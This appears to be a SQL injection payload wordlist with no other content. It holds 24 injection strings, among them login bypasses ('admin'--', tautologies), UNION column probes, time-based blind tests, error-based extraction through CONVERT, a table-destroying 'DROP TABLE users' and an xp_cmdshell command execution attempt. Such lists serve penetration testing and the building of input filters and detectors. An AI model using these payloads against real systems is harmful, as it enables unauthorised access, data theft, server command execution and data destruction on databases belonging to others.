' OR 1=1--
' OR '1'='1
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
1' AND 1=1--
1' AND 1=2--
' OR 1=1#
admin'--
' OR 'a'='a
') OR ('1'='1
'; DROP TABLE users--
1; SELECT * FROM information_schema.tables--
' AND SLEEP(5)--
' WAITFOR DELAY '0:0:5'--
1 AND (SELECT COUNT(*) FROM users)>0
' UNION ALL SELECT 1,2,3,4,5--
' OR EXISTS(SELECT * FROM users WHERE username='admin')--
'; EXEC xp_cmdshell('dir')--
1' ORDER BY 1--
1' ORDER BY 10--
' HAVING 1=1--
' GROUP BY column_name HAVING 1=1--
1 AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--
